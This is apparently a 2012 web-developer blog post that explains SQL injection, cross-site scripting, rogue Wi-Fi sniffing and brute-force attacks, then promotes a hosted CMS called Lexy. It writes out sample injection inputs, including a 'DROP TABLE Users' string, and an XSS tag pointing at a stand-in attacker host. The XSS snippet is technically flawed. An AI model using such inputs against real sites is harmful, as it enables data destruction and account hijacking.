Hackers aren't geniuses, developers are idiots
- Category: Blog
It surprises me to run into people who ask me if I can 'hack.' When I tell them 'uh... yeah, there are a lot of common exploits I know how to take advantage of' they look authentically impressed. They shouldn't be. The majority of web security exploits are less the product of brilliant hackers as they are the product of amateur developers. I'm so tired of arguing with people who think 'password' is a creative password or that blocking JavaScript is pointless. Just to illustrate how easily a developer can mess up a site so that any script-kiddy can violate its security, take a look at this guide. If you're brave enough to try any of these on a real site, and let me remind you that's illegal and I publicly endorse this in no way, the lack of security on the web to this day may terrify you more than Y2K, 2012, and Global Warming combined.
SQL Injection
SQL Injection sounds really technical, doesn't it? It can be, but for the most part an SQL injection simply means typing something very much like this “1 OR TRUE;” or this “; DROP TABLE Users;” into a web form and then submitting it. If those hacks work on a site, it is not because some cyber-genius had a Hollywood action scene where 'he blew right past the firewalls' or flew a hover craft past some robots in a virtual reality, it's because the person who developed the code that talks to the database for that website was an idiot. No developer worth half his salt (most aren't) will ever use data that comes from places like a web address or a form that he hasn't sanitized. Sanitization can mean a lot of things. If a developer doesn't know what it means, they should learn before they ever write another word of computer code.
XSS - Cross Site Scripting
Cross site scripting most often refers to when some code exists on a site you visit that was never supposed to be there. This can be incredibly simple. Some morons will let a third parties stream ads on their site without disabling any JavaScript. I've even once had an argument with a respected professional who thought that if code streamed from a third party in an iframe then the visitor was safe from any malicious JavaScript. In web security terms that's the equivalent to running naked through a minefield in broad daylight while wearing a blind fold, thinking that the blind fold will keep the machine gunners from seeing you since you can't see them.
It's not just ads that add a risk of cross site scripting, either. If a website wasn't made by a responsible adult, any form on the site could be hole for a cross site scripting attack. Just add the line:
<div onload=”http://www.haxors.com/animateComputerToMurderVisitor.js”></div>to a web form where http://www.haxors.com/animateComputerToMurderVisitor.js is the location of computer code that any visitor viewing any page that displays the contents of that form field will then run on their local machine. If the developer is the twit of the year this can even be accomplished without a form on the website simply by sending information to the site in a way much similar to typing an address in a web browser.
What are the wonderful things we can do with JavaScript? I could record every thing you do on that web page for one. I could also redirect you to a page that looks identical to the page you were on before, only my site prompts you for and saves some critical personal information. With a little work that the stupidest of script-kiddies could pull of with 5 minutes of Googling and some copying and pasting someone could even steal your cookies and sessions for that page and change your password on you.
Packet Sniffing
Ever checked your bank account on a public network? I'd advise you to never do so again. There are free programs you can download and run that will allow others users to connect to your computer so that they can access a network that you are connected to. You can call this network anything you want. Say you're connected to a network named Starbucks. You can broadcast a network named Starbucks 2. That sounds totally legit, right? People connect to Starbucks 2 (a slightly more advanced hacker could even attempt to force users on the other network to connect to his network) and you have hundreds of ways, including free programs you simply double click on, to record everything those users try to send on the internet.
Even if you haven't connected to a spoofed network, there are more ways for someone on the same network as you to see everything you get or send on the internet than I could possibly list in this article alone.
Brute Force
A brute force attack is simply a program that continuously guesses passwords until it gets one right. You advanced internet visitors probably think that's crazy, but after decades of hacker abuse many people still think 'password' is a creative password. Many brute force attacks are actually programmed to try the word 'password' first.
Some people think that you can simply block someone who tries to guess too many passwords, but things aren't that simple. Well timed pauses, switches to other user names, or sending your guesses to the victim from several changing locations can bypass most attempts to blacklist addresses that are acting funny. Some login forms now require a Captcha, or question that computers have a hard time answering, after a few failed logins from a specific user, but a security measure that would probably surprise those who think of hacking as an art exclusive to geniuses is to require users to make a good password. If a dictionary can't find a word, it's mixed upper and lower case, it has more than eight characters, and it contains at least one number then it could take a brute force attack running from a super computer many years to solve. I know those things may be annoying if your password is 'hello1234', but if you don't make a password that complicated, even for a site that doesn't require you to, I would strongly urge you to do so for the rest of your life.
Hackers will get into anything eventually
I'm not trying to say that any site that can be hacked was made by an idiot, or that even truly brilliant individuals haven't made some silly mistakes or been plain old lazy. It's just that once you understand how these things are done, it's terrifying how easy it is. It's terrifying how often simple security measures aren't in place on sites that we visit, and how we can be exploited because of the idiocy or foolishness of the development community.
A simple, and surprisingly effective way for a novice developer to avoid the pitfalls of stupid security is to reuse other people's code who know what they're doing. If you're trying to get a website and anything in this blog was new to you I'd strongly recommend you use a service like Lexy and let people with more experience handle your protection along with the many other advantages to a content management system.
Hacking is an inevitability if someone is dedicated enough. The only truly good defense are professional developers and administrators who work full time to defend their web sites and servers against hackers, and even then it's no picnic. If you truly want to be protected, you should give some serious thought to a solution like Lexy.
Related Articles
Latest Posts
-
SEO Building Blocks Part 2: Back Links & Off-Site SEO
May 09, 2012 -
The Important Differences Between Notices, Warnings, Exceptions, and Errors
May 04, 2012 -
SEO Building Blocks: Going Higher & Higher
May 03, 2012 -
Inheritance in OOPHP - Some of What You Can Do and When To Do It
May 01, 2012 -
Online Project Management At It's Best
April 27, 2012
